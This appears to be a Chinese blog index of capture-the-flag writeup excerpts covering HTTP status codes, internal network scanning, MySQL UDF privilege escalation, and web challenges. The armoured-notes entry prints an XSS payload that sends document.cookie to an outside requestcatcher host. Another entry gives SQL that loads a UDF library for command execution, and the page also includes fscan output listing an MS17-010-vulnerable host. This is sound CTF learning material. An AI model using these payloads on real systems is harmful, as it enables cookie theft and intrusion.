MoonlitSyntax - 月光下的轻语

HTTP集邮册

发表于2024-06-07 | Writeup

12种状态码随便访问404 输入错误的host 400 正常 200 自定义方法 405 请求URI过长 414 Range: bytes=10-11111111 206(Date、Cache-Control、E-Tag、Expires、Content-Location和Vary) Range: bytes=111110-11111111 请求范围无法满足416 Expect: 100-continue返回100 Content-Length: 1234567890987过长返回413 HTTP版本不支持 505 If-Match: "12345" 返回412 IF-None-MATCH: "64dbafc8-267"用返回的E-Tag 无状态码 GET / \r\nHost: example.com\r\n\r\n

更深更暗

发表于2024-06-07 | Writeup

直接看js代码,打个断点就出来了

会议室

发表于2024-06-07 | Writeup

# import requests# import json# import re# # 初始化 session# s = requests.Session()# session_value = "eyJ0b2tlbiI6IjMyNTpNRVVDSUdYazdZLzRzOGxISTVtaXRVN0Fub3h6YnpZU0tZRjBSUmJPYzZZaGtiOTlBaUVBN25BS2xQOGVuTWJSUEpEaW5oclZYU1dOdVpBM3BPdlZTZkUrQmUwbEhrcz0ifQ.ZTyNJQ.kI1MQJvggl1tTd9Je6vajHJbTkU"# s.cookies['session'] = session_value# # 获取消息的 URL# get_url = "http://202.38.93.111:10021/api/getMessages"# response = s.post(get_url)# if response.status_code == 200:# resp_json = ...

发表于2024-06-07 | Writeup

修改一下请求栏里的参数然后就启动了

赛博井字棋

赛博井字棋

发表于2024-06-07 | Writeup

抓包,看提交数据,发现可以修改x,y坐标,并且可以覆盖对方放置的棋子

真他妈的抽象

真他妈的抽象

发表于2024-06-07 | Writeup

首先是个扫描,扫到password.txt 接下来有个rce,上线fscan,然后查询,发现两个ip 172.26.21.50Windows 172.26.21.60外面的Ubuntu web服务机 172.26.21.60:22 open172.26.21.50:80 open172.26.21.50:445 open172.26.21.50:139 open172.26.21.50:135 open172.26.21.60:7777 open172.26.21.60:9091 open172.26.21.60:9090 open172.26.21.60:7070 open[*] WebTitle: http://172.26.21.50 code:200 len:689 title:IIS7[+] 172.26.21.50 MS17-010 (Windows 7 Professional 7601 Service Pack 1)[*] WebTitle: http://172.26.21.60:7070 code:200 len:22 ...

sql

发表于2024-06-07 | Writeup

udf提权 SELECT xxxx INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';create function sys_eval returns string soname "moonudf.so"select sys_eval("env");

Spirit2023-web

发表于2024-06-07 | Writeup

音游 [][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[]) ...

armoured-notes

发表于2024-06-07 | Writeup

CVE-2023-49293 template = await vite.transformIndexHtml(url, template);存在漏洞,可以触发xss 先用merge触发原型链污染得到admin身份,然后写文章让bot去访问,带上cve的Payload url?"></script><script>window.location.href=`https://dionysus.requestcatcher.com/${btoa(document.cookie)}`</script>

php_sucks

发表于2024-06-07 | Writeup

<?php$allowedExtensions = ['jpg', 'jpeg', 'png'];$errorMsg = '';if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file']) && isset($_POST['name'])) { $userName = $_POST['name']; $uploadDir = 'uploaded/' . generateHashedDirectory($userName) . '/'; if (!is_dir($uploadDir)) { mkdir($uploadDir, 0750, true); } $uploadedFile ...

fuck_Vultag

发表于2024-06-07 | Writeup

./wasm2wat ../webassembly.wasm -o webassembly.wat ./wasm2c ../webassembly.wasm -o webassembly.c gcc -c webassembly.c -o webassembly.o

no code

发表于2024-06-07 | Writeup

代码如下 from flask import Flask, request, jsonifyimport reapp = Flask(__name__)@app.route('/execute', methods=['POST'])def execute_code(): code = request.form.get('code', '') if re.match(".*[\x20-\x7E]+.*", code): return jsonify({"output": "jk lmao no code"}), 403 result = "" try: result = eval(code) except Exception as e: result = str(e) return jsonify({"outpu ...